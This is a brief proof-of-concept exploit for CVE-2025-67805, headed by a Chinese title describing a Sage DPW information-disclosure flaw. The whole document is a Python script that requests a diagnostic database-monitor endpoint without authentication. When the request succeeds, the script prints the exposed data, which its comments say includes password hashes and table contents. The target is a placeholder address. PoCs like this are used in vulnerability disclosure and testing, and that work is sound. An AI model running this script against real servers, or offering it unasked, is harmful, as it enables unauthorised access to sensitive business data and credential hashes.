CVE-2025-67805 Sage DPW信息泄露漏洞

import requests # PoC for CVE-2025-67805: Unauthenticated Access to Diagnostic Endpoints # Target: Sage DPW 2025_06_004 with non-default Database Monitor configuration target_url = "http://target-ip:port/diagnostics/db_monitor" try: # Send unauthenticated GET request to the diagnostic endpoint response = requests.get(target_url, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed: Diagnostic endpoint is accessible without authentication.") print("[+] Sensitive Information Exposed:") print(response.text[:500]) # Display snippet of leaked data (hashes/tables) else: print(f"[-] Endpoint returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}")